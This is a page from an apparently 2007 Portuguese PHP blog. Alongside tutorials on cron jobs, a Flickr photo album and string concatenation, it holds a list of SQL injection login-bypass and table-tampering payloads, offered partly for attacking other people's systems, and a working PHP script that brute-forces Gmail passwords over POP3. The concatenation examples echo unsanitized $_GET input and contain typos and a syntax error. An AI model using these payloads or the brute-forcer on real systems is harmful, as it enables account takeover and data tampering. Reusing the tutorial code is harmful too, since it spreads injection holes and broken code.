SQL Injection Hacks no PHP

Setembro 24, 2007 on 2:21 pm | In Informatica, php, Hacker | 2 Comments

Continuando a diversão de se fazer testes no seu sistema ou se divertir com sistemas de outros segue uma lista de possíveis SQL injections, lembrando que pode-se utilizar tanto no login/senha no form ou como na url quando se utilizam método de $_GET no php, vamos lá:

PLAIN TEXT
HTML:
  1. user:admin
  2. pass:' or 1=1--
  3. user:' or 1=1--
  4. admin:' or 1=1--
  5. password:' or 1=1--
  6. admin:' or a=a--
  7. admin:' or 1=1--
  8. admin'--
  9. ' or 0=0 --
  10. " or 0=0 --
  11. or 0=0 --
  12. ' or 0=0 #
  13. " or 0=0 #
  14. or 0=0 #
  15. ' or 'x'='x
  16. " or "x"="x
  17. ') or ('x'='x
  18. ' or 1=1--
  19. " or 1=1--
  20. or 1=1--
  21. ' or a=a--
  22. " or "a"="a
  23. ') or ('a'='a
  24. ") or ("a"="a
  25. hi" or "a"="a
  26. hi" or 1=1 --
  27. hi' or 1=1 --
  28. hi' or 'a'='a
  29. hi') or ('a'='a
  30. hi") or ("a"="a
  31. 1 OR 1=1
  32. 1' OR '1'='1
  33. 1'1
  34. 1 EXEC SP_ (or EXEC XP_)
  35. 1 AND 1=1
  36. 1' AND 1=(SELECT COUNT(*) FROM tablenames); --
  37. " AND user like %name% --
  38. "; select user like %name% --
  39. "; update users set passw = 'newpass' where user like %name% --

Existem diversas outras formas de se fazer ataques e fazer antes pesquisas de versões, match, vetores, mapiamento do mysql e até mesmo com user do mysql interno. Mas por hoje fica a lista por aqui, lembrando que fica por sua conta e risco, isso é somente um informativo...


Album de fotos

Setembro 11, 2007 on 1:25 pm | In Informatica, php, Tutorial | 1 Comment

Meu album de fotos, o script foi liberado para uso geral do universo. Leia as informações com calma, respire, compreenda e utilize, seja feliz. :P Dúvidas podem ser postadas aqui com toda liberdade, serão todas respondidas aqui.

Basta no menu do topo clicar em Album de fotos para visualizar as informações ou use o link aqui.


HACK descobrindo senhas de e-mail

Setembro 10, 2007 on 11:38 am | In Informatica, php, Hacker | 47 Comments

Abrirei uma nova sessão de hacks, não afim de que meus leitores ownem (?) o mundo, mas sim para aprender os hacks de php afim de bolar soluções para se proteger contra isso. Vou começar com um hack para descobrir senhas utilizando BrutalForce no PHP através do POP3 dos emails, não irei explicar o que significa os jargões e como obter informações, sim somente uma demonstração de um código que foi disponibilizado pela Webzine do 0x000000.

Feito o script para o gmail, afim de que vejam que o nome do usuário é o email e por isso ja temos 50% de chance a mais para o hack. O script consegue ser rodado para qualquer tipo de POP3 baseado em SSL, como hotmail e muitos outros pela net.

o Código:

PLAIN TEXT
PHP:
  2.  
  3. ini_set("max_execution_time",0);
  4.  
  5.  
  6.  
  7. function bruteforce($email) {
  8.  
  9.  
  10.  
  11. $passlist = array('foo','bar','hello','world','abc','123','bazooka','joe');
  12.  
  13. $start      = 0;
  14.  
  15.  
  16.  
  17. while($forced == false && $start <= count($passlist)) {
  18.  
  19.  
  20.  
  21. usleep(1000000);
  22.  
  23.  
  24.  
  25. $ssl = fsockopen("ssl://pop.gmail.com", 995, $err, $errdata, 40);
  26.  
  27.  
  28.  
  29. if (!$ssl) {
  30.  
  31.  
  32.  
  33. echo "$errdata" . " => " . "$err";
  34.  
  35.  
  36.  
  37. } else {
  38.  
  39.  
  40.  
  41. $auth = fgets($ssl, 128);
  42.  
  43. fputs($ssl, "USER ".$email."\n");
  44.  
  45. $auth = fgets($ssl, 128);
  46.  
  47. fputs($ssl, "PASS ".$passlist[$start]."\n");
  48.  
  49. $auth = fgets($ssl, 128);
  50.  
  51.  
  52.  
  53. $status = substr($auth, 0, 4);
  54.  
  55. if($status == "+OK ") {
  56.  
  57. $forced = true;
  58.  
  59. }
  60.  
  61.  
  62.  
  63. if($status == "-ERR") {
  64.  
  65. $forced = false;
  66.  
  67. $start++;
  68.  
  69. }
  70.  
  71.  
  72.  
  73. fclose ($ssl);
  74.  
  75.  
  76.  
  77. if($forced) {
  78.  
  80. <div style='background-color:lime;font-size:16px;'>Password found: $passlist[$start]</div>
  81. ";
  82.  
  83. }
  84.  
  85. }
  86.  
  87. }
  88.  
  89.  
  90.  
  91. return $forced;
  92.  
  93.  
  94.  
  95. }
  96.  
  97.  
  98.  
  99. bruteforce("bazookajoe@gmail.com");

Fonte : PHP POP3 BruteForcer.


Album de fotos PHP com Flickr

Setembro 5, 2007 on 10:55 pm | In Informatica, Trabalho, php | 4 Comments

Finalmente o dilema do album de fotos foi sanado, desde que tenho esse blog (domínio) o objetivo principal foi ter todas minhas fotos online, porém foi um sacrilégio; uma dificuldade enorme buscar um album de facil gerenciamento, layout básico (limpo) e ainda ter facilidade em qualquer tipo de alteração; até que alguns meses atrás eu tive a feliz notícia do flickr ser traduzido para o português (como se fizesse muita diferença O_o), e o melhor a conta sem limites de albuns, uploads e outros afins por 1 ano, somente R$ 45,90.

Para maior felicidade eles disponibilizam um API para usar fora do domínio do flickr, foi o que eu fiz, peguei a biblioteca do phpFlickr, que é igual o API do flickr traduzida para o PHP e montei minha própria página com meu proprio layout e showroom das fotos.

Logo disponibilizarei o Album de fotos para download para uso de todos, assim que fizer um tutorial de como utilizar o que mudar e como mudar. :P


CronJobs em PHP no Cpanel

Setembro 4, 2007 on 4:57 pm | In Informatica, Trabalho, php, Linux, Tutorial | 1 Comment

Como roda scripts em cronjob no Cpanel, pelo menos os em PHP, depois de muita busca e falta de informação pela net achei um modo de como fazer e vou compartilhar com vocês.

Cron é uma agenda no unix que executa comandos, cronjob é o software que faz a execução desses comandos programados, veja mais no Wikipedia sobre CronJob. Ja que é muito simples não tem muito mais além disto.

Para então nos executarmos no Cpanel um cron de um arquivo em PHP, vamo em Cron Jobs, depois em Advanced (claro que não somos n00bs, somos haxor e vamos onde tem mais opções), logo colocaremos nosso email para caso de algo errado sejamos informados. O comando a ser executado é o endereço completo onde o arquivo esta localizado no servidor, mais ou menos algo assim /home/usuario/public_html/arquivo.php . Nos quadros anteriores nos colocamos de quanto em quanto tempo desejamos executar, a cada minuto so deixar tudo com *, veja mais no wiki sobre Cron. :P

O mais importante agora para executar o Cronjob do php é na primeira linha do seu PHP colocar o codigo abaixo, mesmo antes da tag de iniciação do PHP:

PLAIN TEXT
PHP:
  1. #! /usr/bin/php -q
  2. <?
  3. include "configuracao.php";
  4. $query="SELECT * FROM func WHERE hora <> '00:00:00'";


PHP Concatenação

Agosto 15, 2007 on 1:59 pm | In Informatica, php | 1 Comment

Como é meio comum ver as pessoas que estão começando com PHP terem uma certa dificuldade para com a concatenação de String e outros diversos tipos de dados, vou apresentar como fazer isso, com diferentes modos. Primeiro que a ideia de concatenação seja juntar dados formando uma string ou qualquer outro tipo diferente de dados, mas mantenha-se na ideia de juntar.

Vamos alguns dados:

Concatenador do PHP é o . (PONTO); Ja temos a base agora para tudo que precisamos.

Vamos concatenar uma variável com uma string (texto);

PLAIN TEXT
PHP:
  1. //Declarando variavel
  2. $varivavel = 'Facil';
  3. // Concatenando com um texto
  4. $resultado = 'Para ser ' . $variavel;
  5. // Vendo o resultado
  6. echo $resultado

Simples não ? Vamos a mais alguns exemplos para que você entenda a ideia de que esta tudo junto depois da concatenação.

PLAIN TEXT
PHP:
  1. $num = 4;
  2. $var = 'texto qualquer';
  3. $res= 'Nosso numero é ' . $num . ' E o texto é : ' . $var;
  4. echo $res;

PLAIN TEXT
PHP:
  1. $texto1 = 'Este é um texto complexo para concatenação com variaveis que venham de outros lugar ';
  2. $texto2 = 'Texto, somente texto';
  3. $res = $texto1 . $_GET['Elemento'] . $texto2;
  4. echo $res;

Assim como usamos GET podemos usar POST.  ;P

Podemos também fazer concatenação direto em uma variável, assim somando mais textos ao final dela.

PLAIN TEXT
PHP:
  1. $var1 = 'Texto 01 ';
  2. $var2 = 'Texto 02 ';
  3. $var3 = 'Texto 03 ';
  4. $res = $var1;
  5. $res . = $var2; // Neste momento $res é igual  'Texto 01 Texto 02';
  6. $res .= $var3;
  7. echo $res;

É isso ae, agora basta usar sua criatividade para colocar dentro de estruturas de controle para fazer maravilhas e simplificar seu código e utilizar mais de recursos do PHP.


« Previous PageNext Page »

  

 Assine o feed